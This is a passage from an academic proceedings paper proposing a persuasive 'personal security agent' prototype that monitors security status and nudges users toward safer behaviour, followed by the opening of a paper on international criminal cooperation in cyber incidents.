(Weirich and Sasse 2001).<br />
Users who behave <strong>in</strong> a secure way are seen as ‘paranoid’ or ‘pedantic’, and even untrustworthy by<br />
their colleagues (Sasse, Brostoff and Weirich 2001).<br />
Users may have a poor mental model of security due to a lack of knowledge or the complexity of<br />
security systems (Adams and Sasse 1999; Chiasson, van Oorschot and Biddle 2006).<br />
In view of the above, this paper proposes an additional approach us<strong>in</strong>g a personal (<strong>in</strong>formation) security<br />
agent. A personal security agent may be able to address some of the shortcom<strong>in</strong>gs of SETA programs by<br />
be<strong>in</strong>g context sensitive and provid<strong>in</strong>g <strong>in</strong>dividual feedback to the user. As a dashboard of a motor vehicle<br />
provides the driver with a range of important <strong>in</strong>formation at a glance a personal security agent could<br />
provide the user with a range of security <strong>in</strong>formation at a glance as well as relevant and immediate<br />
feedback. <strong>Security</strong> related <strong>in</strong>formation <strong>in</strong> W<strong>in</strong>dows 7 is provided <strong>in</strong> the form of the Action Center. Some of<br />
the items monitored by the Action Center <strong>in</strong>clude virus protection, spyware protection, user account<br />
control, and w<strong>in</strong>dows updates. The Action Center monitors these security items and notifies users when<br />
changes occur. Upon click<strong>in</strong>g on the Action Center’s flag icon <strong>in</strong> the notification area a list of issues to be<br />
addressed by the user is displayed. However, unless the user clicks the flag icon he will not be rem<strong>in</strong>ded<br />
aga<strong>in</strong> of pend<strong>in</strong>g issues after a notification has been displayed. Also, due to improved customisability <strong>in</strong><br />
W<strong>in</strong>dows 7, a user can turn off these messages. This allows the user to become ignorant of relevant<br />
security issues. The Action Center also lacks an <strong>in</strong>dication of the overall security status. Anti-virus<br />
software provides more specific security <strong>in</strong>formation that relates to viruses. Users are notified if threats<br />
are detected or when new virus def<strong>in</strong>ition updates are available. However, anti-virus software is only one<br />
component of security on a computer. The personal security agent will have a more holistic approach<br />
<strong>in</strong>clud<strong>in</strong>g components such as security education as well. Therefore, the task of the personal security<br />
agent will be to provide <strong>in</strong>dividual and personal feedback regard<strong>in</strong>g the overall security status and<br />
<strong>in</strong>fluence towards secure behaviour as well as re<strong>in</strong>forc<strong>in</strong>g it. The use of persuasive techniques may help<br />
to achieve this task. Persuasive technologies, or captology, were first proposed dur<strong>in</strong>g CHI 1997, an<br />
ACM conference on human factors <strong>in</strong> comput<strong>in</strong>g systems (Fogg 1998). Accord<strong>in</strong>g to Fogg (2003),<br />
persuasive technology is def<strong>in</strong>ed as “<strong>in</strong>teractive comput<strong>in</strong>g systems designed to change people’s<br />
attitudes and behaviours”. Weirich and Sasse (2001) have the op<strong>in</strong>ion that users cannot be forced to<br />
behave <strong>in</strong> a proper fashion, but an effort to persuade them to do so has to be made.<br />
The rest of the paper, which will attempt to implement the aspects discussed above, is structured as<br />
follows. First, a brief discussion on related work is provided. Secondly, a list of objectives for a personal<br />
security agent is provided. Thirdly, an overview of the proposed criteria, which is divided <strong>in</strong>to functions<br />
and characteristics, is provided. F<strong>in</strong>ally, a prototype is presented and some conclud<strong>in</strong>g remarks regard<strong>in</strong>g<br />
future research are given.<br />
2. Related work<br />
Persuasive technology has been applied successfully to doma<strong>in</strong>s such as health, safety and market<strong>in</strong>g.<br />
It was used to persuade people to consume less water at taps (Arroyo, Bonanni and Selker 2005),<br />
encourage physical activity (Consolvo et al. 2009) and healthy liv<strong>in</strong>g (Del Valle and Opalach 2005), as<br />
well as <strong>in</strong>fluenc<strong>in</strong>g people to buy more at supermarkets (Cosley et al. 2003). Recent research done by<br />
Yeo, Rahim and Ren (2009) also applied persuasive pr<strong>in</strong>ciples <strong>in</strong> the field of <strong>in</strong>formation security. Their<br />
research tested the effectiveness of a web-based program <strong>in</strong> order to change the attitudes of end users<br />
towards <strong>in</strong>formation security awareness. The program used two persuasive strategies, “tunnell<strong>in</strong>g” and<br />
“<strong>in</strong>fluenc<strong>in</strong>g through language”, and focussed on e-mail management, password management and virus<br />
protection. It was found that the program was able to positively change the attitudes of participat<strong>in</strong>g<br />
students towards <strong>in</strong>formation security aware behaviour. However, the program does not provide any<br />
feedback regard<strong>in</strong>g the user’s current security context nor does it perform any user activity monitor<strong>in</strong>g.<br />
Further research done by Forget, Chiasson and Biddle (2007) proposed a persuasive authentication<br />
framework. The framework is based on the follow<strong>in</strong>g persuasive pr<strong>in</strong>ciples:<br />
246
Ewald Stieger and Rossouw von Solms<br />
The Personalisation Pr<strong>in</strong>ciple: provid<strong>in</strong>g customised <strong>in</strong>formation offers a more personal experience,<br />
which could be more persuasive than generic <strong>in</strong>formation.<br />
The Simplification Pr<strong>in</strong>ciple: tasks should be made as simple as possible.<br />
The Monitor<strong>in</strong>g Pr<strong>in</strong>ciple: when aware that they are be<strong>in</strong>g observed, users are more likely to perform<br />
the desired behaviour.<br />
The Condition<strong>in</strong>g Pr<strong>in</strong>ciple: us<strong>in</strong>g various forms of re<strong>in</strong>forcement to help shape the desired behaviour<br />
or convert exist<strong>in</strong>g behaviours <strong>in</strong>to habits.<br />
The Social Interaction Pr<strong>in</strong>ciple: users are more likely to be persuaded by a system that appears to<br />
share similar attitudes, traits, and personality.<br />
The persuasive authentication framework was developed to be an effective tool <strong>in</strong> educat<strong>in</strong>g users to<br />
create more secure passwords and therefore does not consider other security issues. However, Forget,<br />
Chiasson and Biddle (2007) are of the op<strong>in</strong>ion that their framework can also be utilised to educate users<br />
about security certificates, phish<strong>in</strong>g, encryption, malware, and many other security issues.<br />
3. Objectives<br />
By tak<strong>in</strong>g the above <strong>in</strong>to account, one can conclude that the ma<strong>in</strong> goal of the personal security agent is to<br />
<strong>in</strong>fluence users towards a more secure behaviour. In order to achieve this, the personal security agent<br />
should:<br />
Provide the user an <strong>in</strong>dication of his/her security status.<br />
Be context sensitive by monitor<strong>in</strong>g user actions and alert<strong>in</strong>g the user immediately when a performed<br />
action has negatively <strong>in</strong>fluenced his/her security status.<br />
Enable, <strong>in</strong>fluence and persuade the user to improve his/her security status.<br />
Be easy to use and not frustrate the user.<br />
Not easily be disabled.<br />
Be configurable to some extent because users may have different security needs.<br />
Be able to report certa<strong>in</strong> users that cont<strong>in</strong>uously do not follow security practices.<br />
Educate the user regard<strong>in</strong>g relevant security items<br />
4. Criteria of a personal security agent<br />
This section will propose a set of criteria that may enable the personal security agent to achieve the<br />
above objectives. The criteria have been divided <strong>in</strong>to functions and characteristics for a personal security<br />
agent.<br />
4.1 Functions<br />
This section will discuss the most important functions of the proposed personal security agent.<br />
4.1.1 To persuade<br />
Fogg (1998) has synthesised various def<strong>in</strong>itions to def<strong>in</strong>e persuasion as “an attempt to shape, re<strong>in</strong>force,<br />
or change behaviors, feel<strong>in</strong>gs, or thoughts about an issue, object, or action.” Therefore, the personal<br />
security agent will persuade users towards more secure behaviour. Research done by O<strong>in</strong>as-Kukkonen<br />
and Harjumaa (2009) has led them to develop a framework for design<strong>in</strong>g and evaluat<strong>in</strong>g persuasive<br />
systems. The framework describes various persuasive techniques of which the follow<strong>in</strong>g are relevant to<br />
the personal security agent and can support its persuasive abilities:<br />
Reduction: Refers to reduc<strong>in</strong>g complex behaviour <strong>in</strong>to simple tasks.<br />
Tunnell<strong>in</strong>g: Guid<strong>in</strong>g users through a process or experience.<br />
Self-monitor<strong>in</strong>g: Refers to a system that keeps track of one’s own performance or status and<br />
supports the user <strong>in</strong> achiev<strong>in</strong>g goals.<br />
Praise: By offer<strong>in</strong>g praise, a system can make users more open to persuasion.<br />
Rewards: Systems that reward target behaviours may have great persuasive powers.<br />
Surface credibility: A look and feel that conveys credibility<br />
247
Ewald Stieger and Rossouw von Solms<br />
Rem<strong>in</strong>ders: Rem<strong>in</strong>d<strong>in</strong>g users regard<strong>in</strong>g their security status and behaviour<br />
Lik<strong>in</strong>g: A system that is visually attractive for its users is likely to be more persuasive.<br />
Social comparison: System users will have a greater motivation to perform the target behaviour if<br />
they can compare their performance with the performance of others.<br />
In addition to the above, the condition<strong>in</strong>g and monitor<strong>in</strong>g pr<strong>in</strong>ciple described <strong>in</strong> section 2 may provide<br />
additional support. Accord<strong>in</strong>g to Forget, Chiasson and Biddle (2007) persuasive technology must be<br />
applied with great care, because there is always a risk of annoy<strong>in</strong>g users to the po<strong>in</strong>t that they rebel<br />
aga<strong>in</strong>st the system. Furthermore, Berdichevsky and Neuenschwader (1999) state that there are also<br />
ethical considerations that should be considered, the most important be<strong>in</strong>g that the creators of a<br />
persuasive technology should never try to persuade users of someth<strong>in</strong>g when they would not consent to<br />
be persuaded of it.<br />
4.1.2 To motivate<br />
The personal security agent needs to motivate secure behaviour. Users can be motivated <strong>in</strong> various<br />
ways. A well known motivation strategy is to provide a reward or <strong>in</strong>centive. Rewards can be used as<br />
effective means for cultivat<strong>in</strong>g <strong>in</strong>terest and <strong>in</strong>creas<strong>in</strong>g motivation and performance (Cameron and Pierce<br />
2002) and can be tangible or <strong>in</strong>tangible. Furthermore, the use of rewards is <strong>in</strong>dividual: what may work as<br />
re<strong>in</strong>forcement for one person may not work for another person. However, motivation can also occur<br />
through fear. Rogers’ protection motivation theory (Rogers 1983) concerns itself with the use of fear<br />
appeals to change the behaviour of people. It states that fear appeals will be effective if they conv<strong>in</strong>ce the<br />
recipient that:<br />
The problem is serious;<br />
It may affect him/her;<br />
It can be avoided by tak<strong>in</strong>g appropriate action; and<br />
The recipient is capable of perform<strong>in</strong>g the necessary behaviour required to avoid the problem.<br />
Motivation may also benefit from the competitive nature of people. Accord<strong>in</strong>g to Cheng (2004)<br />
competition and recognition can be used to motivate people's behaviours s<strong>in</strong>ce most people desire to w<strong>in</strong><br />
<strong>in</strong> contests and hope to obta<strong>in</strong> the glory as a k<strong>in</strong>d of validation from others.<br />
4.1.3 To escalate<br />
The personal security agent needs to be able to escalate bad or <strong>in</strong>appropriate security behaviour. This<br />
escalation may occur <strong>in</strong> two ways:<br />
It may re<strong>in</strong>force security pr<strong>in</strong>ciples by repeat<strong>in</strong>g them through persuasive messages more often.<br />
Br<strong>in</strong>g<strong>in</strong>g the particular user to the attention of an <strong>in</strong>formation security officer.<br />
However, before any escalation will take place, the personal security agent will have provided the user<br />
with <strong>in</strong>formation regard<strong>in</strong>g his/her behaviour as well as advice on how and why he/she needs to change<br />
behaviour. Only if this <strong>in</strong>formation is constantly disregarded by the user, escalation should take place.<br />
4.1.4 To educate<br />
The personal security agent will provide the users with <strong>in</strong>formation on ways to improve their security<br />
status. Information will be provided on what <strong>in</strong>fluences their security status, why it affects the security<br />
status, and how to improve the security status. Information regard<strong>in</strong>g common threats and how they<br />
manifest themselves should also be given. Users that are more knowledgeable regard<strong>in</strong>g threats and<br />
<strong>in</strong>formation security will be less likely to make wrong decisions.<br />
Based on the above functions, the personal security agent will use persuasive pr<strong>in</strong>ciples, motivation and<br />
education to <strong>in</strong>fluence user behaviour. For example, a user may be praised for ma<strong>in</strong>ta<strong>in</strong><strong>in</strong>g a good<br />
security status, motivated by compar<strong>in</strong>g his/her security status to that of other users and educated that<br />
his/her password should not only consist of letters. Also, users that exhibit cont<strong>in</strong>uous <strong>in</strong>secure behaviour<br />
may need to be reported so that further action can be taken.<br />
4.2 Characteristics<br />
This section describes the possible characteristics of the personal security agent.<br />
248
4.2.1 Usability and <strong>in</strong>terface design<br />
Ewald Stieger and Rossouw von Solms<br />
Usability may be def<strong>in</strong>ed as the ease of use of a specific technology, how effective the technology is <strong>in</strong><br />
meet<strong>in</strong>g the user’s needs and the satisfaction of the user with the results obta<strong>in</strong>ed by us<strong>in</strong>g the<br />
technology to perform specific tasks (Johnson 2006). A research area that explores human computer<br />
<strong>in</strong>teraction (HCI) <strong>in</strong> computer security is security HCI (HCI-S). <strong>Security</strong> HCI has been def<strong>in</strong>ed by<br />
Johnston, Eloff and Labuschagne (2003) as “the part of a UI which is responsible for establish<strong>in</strong>g the<br />
common ground between a user and the security features of a system. HCI-S is human computer<br />
<strong>in</strong>teraction applied <strong>in</strong> the area of computer security”. Furthermore, they mention that poor usability design<br />
<strong>in</strong> security systems or features often creates an aversion amongst users. This results <strong>in</strong> security be<strong>in</strong>g<br />
ignored and not used. S<strong>in</strong>ce the personal security agent may be regarded as a security feature, it will<br />
adapt the design criteria proposed by Johnston, Eloff and Labuschagne (2003). These criteria facilitate<br />
develop<strong>in</strong>g usable <strong>in</strong>terfaces that are used <strong>in</strong> a security environment and are based on Nielsen’s (2005)<br />
heuristics traditionally used for heuristic evaluation:<br />
Visibility of system status: The user <strong>in</strong>terface (UI) must <strong>in</strong>form the user about the <strong>in</strong>ternal state of the<br />
system, for example a message could <strong>in</strong>dicate that a security feature is active.<br />
Aesthetic and m<strong>in</strong>imalist design: Only security <strong>in</strong>formation relevant to the user should be displayed. The<br />
security UI must be simple and easy to use, ma<strong>in</strong>ta<strong>in</strong><strong>in</strong>g a m<strong>in</strong>imalist design.<br />
Satisfaction: The security activities must be easy to realize and understand.<br />
Convey features: The UI needs to convey the available security features to the user clearly and<br />
appropriately; a good way to do it is by us<strong>in</strong>g figures or pictures.<br />
Learn<strong>in</strong>g ability: The UI needs to be as non-threaten<strong>in</strong>g and easy to learn as possible.<br />
4.2.2 Context sensitivity<br />
Accord<strong>in</strong>g to Zurko (2005), security mechanisms that cannot be understood cannot be effective. Users<br />
need to understand how to use the security controls that are directly relevant to their task and context.<br />
Users can complete a task but are likely to make the wrong decision if they do not know the security<br />
implication that it has. The personal security agent will cont<strong>in</strong>uously check for changes that affect the<br />
security status of a user. A detected change and the <strong>in</strong>fluence that it has on the user’s security status will<br />
be reported through a rapid feedback cycle:<br />
User performs an security related action<br />
Personal security agent detects change <strong>in</strong> the user’s security context<br />
An evaluation of the change occurs<br />
User is provided with feedback regard<strong>in</strong>g the action that he/she performed<br />
This can be considered as just-<strong>in</strong>-time persuasion. Just-<strong>in</strong>-time persuasion can be very effective, s<strong>in</strong>ce<br />
the feedback is highly related and available at just the moment people make a decision (Cheng 2004).<br />
4.2.3 Information<br />
S<strong>in</strong>ce the personal security agent will cont<strong>in</strong>uously check for changes that affect the security status of a<br />
computer user, it will need <strong>in</strong>formation to determ<strong>in</strong>e whether a particular change is positive or negative.<br />
This decision support <strong>in</strong>formation may be based on an <strong>in</strong>formation security basel<strong>in</strong>e for computer users <strong>in</strong><br />
general or a policy such as an organization’s computer usage policy. Also, users <strong>in</strong> different roles may<br />
have different security requirements. For example, a home user may not have to secure his/her computer<br />
to the same degree as an <strong>in</strong>vestment portfolio manager <strong>in</strong> the f<strong>in</strong>ance department. Therefore, the<br />
personal security agent needs to be configurable to some extent.<br />
4.2.4 Persistency<br />
In order to provide the user with cont<strong>in</strong>uous feedback the personal security agent must be “always on”. It<br />
should also not be easily deactivated or switched off by a user s<strong>in</strong>ce this would defeat its purpose.<br />
249
4.2.5 Evolv<strong>in</strong>g<br />
Ewald Stieger and Rossouw von Solms<br />
The “threat landscape” is constantly chang<strong>in</strong>g. New threats occur on a daily basis and steal<strong>in</strong>g<br />
<strong>in</strong>formation has become big bus<strong>in</strong>ess. For the year 2010 more than 20 million new stra<strong>in</strong>s of malware<br />
were identified (PandaLabs, 2010). Furthermore, <strong>in</strong>formation thieves are becom<strong>in</strong>g more sophisticated by<br />
the day and have formed groups and alliances to target users. Some of the changes that can be<br />
identified are as follows:<br />
There is a transition from email towards more immediate methods such as <strong>in</strong>stant messag<strong>in</strong>g and<br />
Twitter. Instant messag<strong>in</strong>g and social media connections will replace email as primary distribution<br />
method for malicious code and l<strong>in</strong>ks (McAfee, 2011).<br />
There is an <strong>in</strong>creas<strong>in</strong>g amount of cyber-protests or “hacktivism”. More people voluntarily allow their<br />
computer to participate <strong>in</strong> defacement and denial of service attacks to demonstrate their political and<br />
social views (McAfee, 2011; PandaLabs 2010).<br />
Attack toolkits, such as Zeus, are becom<strong>in</strong>g more user-friendly and accessible to novices (McAfee,<br />
2011; Symantec, 2010). In addition to this a mobile version of Zeus has been discovered (Lennon,<br />
2010).<br />
The personal security agent can therefore not rema<strong>in</strong> stagnant and has to adapt and evolve <strong>in</strong> tandem<br />
with the threats that are out there.<br />
By us<strong>in</strong>g pr<strong>in</strong>ciples of security HCI, it may be ensured that the personal security agent is user friendly.<br />
For example, the visibility pr<strong>in</strong>ciple may be realised <strong>in</strong> the form of a gauge that <strong>in</strong>dicates the security<br />
status us<strong>in</strong>g colours such as red, yellow and green. Context sensitivity will allow the personal security<br />
agent to be persuasive the moment the user performs an <strong>in</strong>secure action. Furthermore, the <strong>in</strong>formation<br />
will enable it to make decisions regard<strong>in</strong>g user behaviour. The <strong>in</strong>formation may be regarded as a<br />
monitor<strong>in</strong>g configuration and should be adjustable by an authorised person. By be<strong>in</strong>g persistent the<br />
personal security agent will be able to monitor the user’s actions and will ensure that it cannot be<br />
deactivated easily. F<strong>in</strong>ally, be<strong>in</strong>g able to evolve will allow it to keep up with the chang<strong>in</strong>g “threat<br />
landscape” and to be a step ahead.<br />
This section discussed the functions and characteristics of the proposed personal security agent. The<br />
functions def<strong>in</strong>ed what the personal security agent should be able to do and the characteristics def<strong>in</strong>ed<br />
the attributes of it. The criteria, consist<strong>in</strong>g of functions and characteristics, can be studied through the<br />
development of a prototype. The next section provides a discussion on such a prototype.<br />
5. Developments<br />
Tak<strong>in</strong>g all the criteria discussed above <strong>in</strong>to account, a prototype of a personal security agent has been<br />
developed us<strong>in</strong>g C# as a programm<strong>in</strong>g language and W<strong>in</strong>dows Presentation Foundation (WPF) for the<br />
front end design. Figure 1 below shows a screenshot of the prototype.<br />
Figure 1: A prototype of a personal security agent<br />
250
Ewald Stieger and Rossouw von Solms<br />
The prototype <strong>in</strong>teracts similar to a chat based program by automatically slid<strong>in</strong>g <strong>in</strong> and out of view from<br />
the bottom right of the taskbar. It is designed to persuade the user more often when his/her overall<br />
security status, as <strong>in</strong>dicated by the dial <strong>in</strong> the top right, is <strong>in</strong> the red zone than when it is <strong>in</strong> the green<br />
zone. Furthermore, if a change <strong>in</strong> the security status occurs the user will be notified of the change and its<br />
cause. The overall security status is determ<strong>in</strong>ed from the various status items <strong>in</strong>dicated below status<br />
detail. These items <strong>in</strong>clude for example, whether the antivirus program is updated or the firewall is<br />
enabled. For each item the user can obta<strong>in</strong> additional <strong>in</strong>formation regard<strong>in</strong>g why it is important and how<br />
to fix it. The status items may differ based on the user’s context as discussed <strong>in</strong> section 4.2.3.<br />
Latest security related news is displayed by us<strong>in</strong>g a Really Simple Syndication (RSS) feed. This allows<br />
the user to be aware of the latest threats and security issues out there. The news may also motivate the<br />
user to behave more securely. An educational aspect is added <strong>in</strong> the form of random cyber-threats be<strong>in</strong>g<br />
displayed and allow<strong>in</strong>g the user to view <strong>in</strong>formation regard<strong>in</strong>g them. Additionally, the construction of<br />
strong passwords may be considered one of the cornerstones of <strong>in</strong>formation security. This prompted the<br />
idea to add a password strength tester to the prototype. The tester <strong>in</strong>dicates the strength with a bar that<br />
changes colour from red (very weak) to green (very strong) as the password is typed. The password<br />
strength is determ<strong>in</strong>ed us<strong>in</strong>g an algorithm the considers factors such as length, use of upper and lower<br />
case, use of numbers and symbols amongst others. F<strong>in</strong>ally, the prototype also keeps track of the number<br />
of days the user is secure or <strong>in</strong>secure as well as the longest secure period.<br />
6. Benefits<br />
For companies and <strong>in</strong>dividuals there are many negative consequences such as negative publicity,<br />
competitive disadvantage, identity theft, loss of <strong>in</strong>formation and customer confidence, as well as f<strong>in</strong>ancial<br />
loss that can be associated with <strong>in</strong>secure user behaviour. Therefore, a personal security agent that<br />
positively <strong>in</strong>fluences users towards more secure behavior would be beneficial. Furthermore, a Gartner<br />
analyst report estimated that <strong>in</strong> less than a decade, organizations will typically deal with 30 times more<br />
<strong>in</strong>formation than they do today (Johnson 2006). This suggests an <strong>in</strong>crease <strong>in</strong> related security breaches<br />
and a need to f<strong>in</strong>d solutions for <strong>in</strong>secure behavior.<br />
7. Conclusions<br />
Influenc<strong>in</strong>g users towards secure behaviour is a difficult task and this is often the reason why <strong>in</strong>formation<br />
security is not as successful as it could be. Threats follow an <strong>in</strong>creas<strong>in</strong>g trend and a new approach to<br />
combat<strong>in</strong>g <strong>in</strong>secure behaviour needs to be found. This paper therefore has proposed the approach of<br />
us<strong>in</strong>g a personal security agent. An “<strong>in</strong>teractive security dashboard” that persuades users to be more<br />
secure. For the personal security agent a set of criteria were proposed consist<strong>in</strong>g of functions and<br />
characteristics that may enable it to achieve its goal. The criteria are not set <strong>in</strong> stone and need to be<br />
tested. Therefore, to apply the theory <strong>in</strong> practice a prototype has been developed to test some of the<br />
proposed criteria. Future research will <strong>in</strong>clude test<strong>in</strong>g the prototype to obta<strong>in</strong> feedback regard<strong>in</strong>g<br />
proposed criteria, which may then be revised accord<strong>in</strong>gly. In addition, the results may <strong>in</strong>dicate an<br />
effective strategy that a personal security agent can follow <strong>in</strong> order to <strong>in</strong>fluence a user towards more<br />
secure behaviour. F<strong>in</strong>ally, the outcome of the research will be a framework that can be used to develop<br />
personal security agents. This framework may then be used to develop personal security agents that<br />
<strong>in</strong>fluence users towards more secure behaviour and assists them <strong>in</strong> secur<strong>in</strong>g their systems.<br />
References<br />
Adams, A. and Sasse, M. (1999) “Users are not the enemy”, Commun. of the ACM, Vol 42, pp 41-46.<br />
Albrechtsen, E. (2007) “A qualitative study of users' view on <strong>in</strong>formation security”, Computers & <strong>Security</strong>, Vol 26, pp<br />
276 – 289.<br />
Austen, J. and Stewart, G. (2008) “Maximis<strong>in</strong>g the Effectiveness of Information <strong>Security</strong> Awareness”, 2008 Royal<br />
Holloway Series, [onl<strong>in</strong>e], http://media.techtarget.com/search<strong>Security</strong>UK/ downloads/<br />
RHUL_Stewart_FINALFINAL.pdf.<br />
Arroyo, E.; Bonanni, L. and Selker, T. (2005) “Waterbot: explor<strong>in</strong>g feedback and persuasive techniques at the s<strong>in</strong>k”,<br />
In: Proceed<strong>in</strong>gs of the SIGCHI conference on Human factors <strong>in</strong> comput<strong>in</strong>g systems, 2005, pp 639.<br />
Beautement, A. and Sasse, A. (2009) ”The economics of user effort <strong>in</strong> <strong>in</strong>formation security”, Computer Fraud &<br />
<strong>Security</strong>, Vol 2009, pp 8 – 12.<br />
Berdichevsky D. and Neuenschwander E. (1999) “Toward an Ethics of Persuasive Technology”, Communications of<br />
the ACM, Vol 42, No 5, pp 51-58.<br />
Cameron, J. and Pierce, W. (2002) Rewards and <strong>in</strong>tr<strong>in</strong>sic motivation, Berg<strong>in</strong> & Garvey, Westport, Conn.<br />
Cheng, R. (2004) “Persuasion strategies for computers as persuasive technologies”, [onl<strong>in</strong>e], Department of<br />
Computer Science, University of Saskatchewan, http://homepage.usask. ca/rac740/file/paper811.pdf.<br />
251
Ewald Stieger and Rossouw von Solms<br />
Chiasson, S., van Oorschot, P.C. and Biddle, R. (2006) “A Usability Study and Critique of Two Password Managers”,<br />
15th USENIX <strong>Security</strong> Symposium, 2006, USENIX, Berkeley, CA, USA. pp1-16.<br />
Consolvo, S., Klasnja, P., McDonald, D. and Landay, J. (2009) “Goal-sett<strong>in</strong>g considerations for persuasive<br />
technologies that encourage physical activity”, In: Proceed<strong>in</strong>gs of the 4th International Conference on<br />
Persuasive Technology, 2009, pp 1-8.<br />
Cosley, D., Lam, S., Albert, I., Konstan, J. and Riedl, J. (2003) “Is see<strong>in</strong>g believ<strong>in</strong>g?: how recommender system<br />
<strong>in</strong>terfaces affect users' op<strong>in</strong>ions”, In: Proceed<strong>in</strong>gs of the SIGCHI conference on Human factors <strong>in</strong> comput<strong>in</strong>g<br />
systems, 2003, pp 592.<br />
Del Valle, A. and Opalach, A. (2005) “The Persuasive Mirror: computerized persuasion for healthy liv<strong>in</strong>g”, In:<br />
Proceed<strong>in</strong>gs of the 11th International Conference on Human-Computer Interaction.<br />
Fogg, B.J. (1998) “Persuasive computers: perspectives and research directions”, In: Proceed<strong>in</strong>gs of the SIGCHI<br />
conference on Human factors <strong>in</strong> comput<strong>in</strong>g systems, 1998, pp 225-232.<br />
Fogg, B.J. (2003) Persuasive Technology: Us<strong>in</strong>g Computers to Change What We Th<strong>in</strong>k and Do, Morgan Kaufmann,<br />
San Francisco, CA, USA.<br />
Forget, A., Chiasson, S. and Biddle, R. (2007) “Persuasion as education for computer security”, AACE E-Learn,<br />
2007, pp 822-829.<br />
Johnson, E. C. (2006) “<strong>Security</strong> awareness: switch to a better programme”, Network <strong>Security</strong>, Vol 2006, pp 15 – 18.<br />
Johnson, M.E. and Goetz, E. (2007) "Embedd<strong>in</strong>g <strong>in</strong>formation security <strong>in</strong>to the organization", IEEE <strong>Security</strong> & Privacy,<br />
2007, pp 16-24.<br />
Johnston J., Eloff J. and Labuschagne L. (2003) “<strong>Security</strong> and human computer <strong>in</strong>terfaces”, IEEE Computers &<br />
<strong>Security</strong>, 2003, 22(8).<br />
Lennon, M. (2010) "ZeuS Goes Mobile - Targets Onl<strong>in</strong>e Bank<strong>in</strong>g Two Factor Authentication" , <strong>Security</strong> Week,<br />
[onl<strong>in</strong>e], http://www.securityweek.com/zeus-goes-mobile-targets-onl<strong>in</strong>e-bank<strong>in</strong>g-two-factor-authentication<br />
McAfee (2011) "2011 Threat Predictions", [onl<strong>in</strong>e], http://www.mcafee.com/us/resources/ reports/rp-threatpredictions-2011.pdf<br />
Muñoz-Arteaga, J., González, R. M., Mart<strong>in</strong>, M. V., Vanderdonckt, J. and Álvarez-Rodríguez, F. (2009) “A<br />
methodology for design<strong>in</strong>g <strong>in</strong>formation security feedback based on User Interface Patterns”, Advances <strong>in</strong><br />
Eng<strong>in</strong>eer<strong>in</strong>g Software, 2009, Vol 40, pp 1231 – 1241.<br />
Nielsen J. (2005) “Ten usability heuristics”, [onl<strong>in</strong>e], Nielsen & Norman Group, Mounta<strong>in</strong> View,<br />
http://www.useit.com/papers/heuristic/heuristic_list.html.<br />
O<strong>in</strong>as-Kukkonen, H. and Harjumaa, M. (2009) “Persuasive Systems Design: Key Issues, Process Model, and<br />
System Features”, Communications of the Association for Information Systems, 2009, Vol 24, pp 28.<br />
PandaLabs (2010) "Annual Report PandaLabs 2010", [onl<strong>in</strong>e], http://press.pandasecurity.com/wpcontent/uploads/2010/05/PandaLabs-Annual-Report-2010.pdf<br />
Ponemon Institute (2009) “Trends <strong>in</strong> Insider Compliance with Data <strong>Security</strong> Policies”, [onl<strong>in</strong>e],<br />
http://www.ponemon.org/local/upload/fckjail/generalcontent/18/file/Trends%20<strong>in</strong>%20Insider%20Compliance%2<br />
0with%20Policies%20F<strong>in</strong>al%203.pdf.<br />
Poulsen, K. (2000) “Mitnick to lawmakers: People, phones and weakest l<strong>in</strong>ks”, [onl<strong>in</strong>e], http://www.politechbot.com/p-<br />
00969.html.<br />
Rogers, R.W. (1983) ”Cognitive and physiological processes <strong>in</strong> fear appeals and attitude change: A revised theory of<br />
protection motivation", In: Cacioppo, J., Petty, R. (eds.) Social Psychophysiology, Guilford Press, New York.<br />
Sasse, M., Brostoff, S. and Weirich, D. (2001) “Transform<strong>in</strong>g the "weakest l<strong>in</strong>k" - a human/computer <strong>in</strong>teraction<br />
approach to usable and effective security”, BT Technology Journal, Spr<strong>in</strong>ger, Vol 19, pp122-131.<br />
Sophos (2011) “Sophos <strong>Security</strong> Threat Report: 2011”, [onl<strong>in</strong>e],<br />
http://www.sophos.com/sophos/docs/eng/papers/sophos-security-threat-report-2011-wpna.pdf.<br />
Valent<strong>in</strong>e, J.A. (2006) “Enhanc<strong>in</strong>g the employee security awareness model”, Computer Fraud & <strong>Security</strong>, Elsevier,<br />
Vol 2006, pp 17-19.<br />
Symantec (2011) "Symantec Report on Attack Kits and Malicious Websites", [onl<strong>in</strong>e],<br />
http://www.symantec.com/content/en/us/enterprise/other_resources/bsymantec_report_on_attack_kits_and_malicious_websites_21169171_WP.en-us.pdf<br />
Weirich, D. and Sasse, M. A. (2001) “Pretty good persuasion: a first step towards effective password security for the<br />
real world”, In: Proceed<strong>in</strong>gs of the 2001 workshop on New security paradigms. ACM. 2001, pp 143.<br />
West, R. (2008) “The psychology of security”. Commun. of the ACM, Vol 51, pp 34-40.<br />
Whitten, A. and Tygar, J.D. (1999) “Why Johnny Can’t Encrypt: A Usability Evaluation of PGP 5.0”, 8th USENIX<br />
<strong>Security</strong> Symposium, 1999, USENIX, Berkeley, CA, USA, pp 169-183.<br />
Yeo, A. C., Rahim, M. M. and Ren, Y. Y. (2009) “Use of Persuasive Technology to Change End-Users’ IT <strong>Security</strong><br />
Aware Behaviour: A Pilot Study”, International Journal of Behavioral, Cognitive, Educational and Psychological<br />
Sciences, 2009, Vol 1, pp 48-55.<br />
Zurko, M. (2005) “User-centered security: Stepp<strong>in</strong>g up to the grand challenge”, Computer <strong>Security</strong> Applications<br />
Conference, 21st Annual, 2005, 14.<br />
252
International Crim<strong>in</strong>al Cooperation <strong>in</strong> the Context of Cyber<br />
Incidents<br />
Anna-Maria Talihärm<br />
Cooperative Cyber Defence Centre of Excellence, Tall<strong>in</strong>n, Estonia<br />
anna-maria.taliharm@ccdcoe.org<br />
Abstract: The borderless and <strong>in</strong>creas<strong>in</strong>gly sophisticated nature of cyber crime calls for effective and timely<br />
responses from numerous stakeholders worldwide – <strong>in</strong>clud<strong>in</strong>g law enforcement agencies, <strong>in</strong>ternational organisations,<br />
Computer Emergency Response Teams and Internet Service Providers. Therefore, the role of <strong>in</strong>ternational crim<strong>in</strong>al<br />
cooperation <strong>in</strong> the context of cyber <strong>in</strong>cidents is becom<strong>in</strong>g <strong>in</strong>creas<strong>in</strong>gly crucial. Cyberspace has challenged the<br />
fundamental pr<strong>in</strong>ciple of territorial jurisdiction and thus emphasises even more the burden on successful cross-border<br />
cooperation. Above and beyond the technical concerns of poor attacker attribution and the difficulties of acquir<strong>in</strong>g<br />
digital evidence, some of the primary <strong>in</strong>ternational legal obstacles <strong>in</strong>clude the lack of requisite procedural rules,<br />
